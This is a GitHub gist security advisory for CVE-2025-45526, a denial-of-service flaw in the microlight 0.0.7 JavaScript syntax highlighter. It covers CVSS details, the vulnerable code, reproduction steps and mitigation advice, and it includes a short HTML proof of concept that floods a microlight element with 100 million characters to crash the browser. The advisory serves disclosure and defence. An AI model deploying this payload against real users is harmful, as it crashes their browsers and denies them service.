Skip to content

Instantly share code, notes, and snippets.

@Rootingg

Rootingg/CVE-2025-45526 microlight-dos-vulnerability.md

Last active June 16, 2025 19:46
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save Rootingg/483b09b760d031b62b172f2153f3ed2a to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save Rootingg/483b09b760d031b62b172f2153f3ed2a to your computer and use it in GitHub Desktop.
Download ZIP
microlight-dos-vulnerability
Raw
CVE-2025-45526 microlight-dos-vulnerability.md

Denial of Service (DoS) Vulnerability in microlight 0.0.7 (CWE-400)

CVE-2025-45526

Summary

A denial of service (DoS) vulnerability, classified as CWE-400 (Uncontrolled Resource Consumption), has been identified in the JavaScript library microlight version 0.0.7. This library, used for syntax highlighting, does not limit the size of textual content it processes in HTML elements with the microlight class. When excessively large content (e.g., 100 million characters) is processed, the reset function in microlight.js consumes excessive memory and CPU resources, causing browser crashes or unresponsiveness. An attacker can exploit this vulnerability by tricking a user into visiting a malicious web page containing a microlight element with large content, resulting in a denial of service.

Vulnerability Details

  • Vulnerability Type: Denial of Service (DoS) / CWE-400 (Uncontrolled Resource Consumption)
  • Affected Product: microlight
  • Affected Version: 0.0.7
  • CVE ID: CVE-2025-45526
  • Fixed Version: None (as of March 28, 2025)
  • Impact: Denial of service (browser crash or unresponsiveness)
  • Affected Component: microlight.js file, reset function
  • Attack Vector: Network - The attacker must trick the user into visiting a malicious web page
  • User Interaction: Required (user must load the malicious page)
  • CVSS v3.1 Score: 6.5 (Medium)
    Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Proof of Concept (PoC)

The following code demonstrates the vulnerability exploitation. When loaded in a browser, it causes a crash due to memory exhaustion.

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>PoC - microlight DoS Vulnerability</title>
</head>
<body>
    <div class="microlight">
        <!-- Generates 100 million characters -->
        <script>document.write("a".repeat(100000000));</script>
    </div>
    <script src="microlight.js"></script>
</body>
</html>

Steps to Reproduce:

  1. Download microlight version 0.0.7 from the GitHub repository.
  2. Create an HTML file with the code above.
  3. Serve the file via a local server (e.g., python -m http.server 15500).
  4. Access the page via a browser (e.g., http://127.0.0.1:15500/).
  5. Observe that the browser becomes unresponsive or displays a memory error (e.g., "Not enough memory to open this page" in Chrome).

Technical Analysis

The vulnerability lies in the reset function of microlight.js, which processes textual content character by character in elements with the microlight class. Here are the key points:

  • Vulnerable Code:

    for (i = 0; el = microlighted[i++];) {
    var text = el.textContent,
        pos = 0,
        next1 = text[0],
        chr = 1,
        token = '',
        tokenType = 0;
    el.innerHTML = '';
    while (prev2 = prev1, prev1 = tokenType < 7 && prev1 == '\\' ? 1 : chr) {
        chr = next1;
        next1 = text[++pos];
        // ... (tokenization logic)
        if (token) {
            el[appendChild](node = _document.createElement('span'));
            node[appendChild](_document.createTextNode(token));
        }
        token += chr;
    }
}

  • Impact:

    • Memory: Creation of millions of DOM nodes, leading to memory exhaustion.
    • CPU: Intensive processing for each character, making the browser unresponsive.
    • Result: Browser crash (e.g., "Render process gone" in Chrome).

Mitigation Recommendations

For the Vendor (Dmitry Prokashev)

  1. Add a maximum size limit for textual content processed in the reset function. For example: 
    if (text.length > 1000000) {
    console.warn("microlight: Content too large, skipping highlighting.");
    return;
}
  2. Optimize processing by grouping characters of the same token into a single <span> before adding to the DOM.
  3. Publish a new version (e.g., 0.0.8) with these fixes.

For Users

  1. Avoid using microlight 0.0.7 in environments where untrusted content may be processed.
  2. Implement server-side validation to limit content size in microlight elements.
  3. Consider switching to alternative libraries like Prism.js or Highlight.js until a fix is available.

CVE Submission Information

  • Vulnerability Type: CWE-400 (Uncontrolled Resource Consumption)
  • Affected Product: microlight 0.0.7
  • Vendor: Dmitry Prokashev (asvd)
  • Impact: Denial of service
  • Attack Vector: Network, user interaction required
  • CVSS Score: 6.5 (Medium)
  • Discoverer: TORRES LUCAS (Rooting)
  • References:

Credits

This vulnerability was discovered and analyzed as part of cybersecurity research. Credits should be attributed to Rooting.

References

Additional Information

  • Discovery Date: March 28, 2025
  • Vendor Status: The vendor has not confirmed or acknowledged the vulnerability (as of March 28, 2025). The GitHub repository has not been updated since 2016.
  • Additional Recommendation: Developers using microlight should consider thorough testing for other potential vulnerabilities, especially in scenarios involving untrusted inputs.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment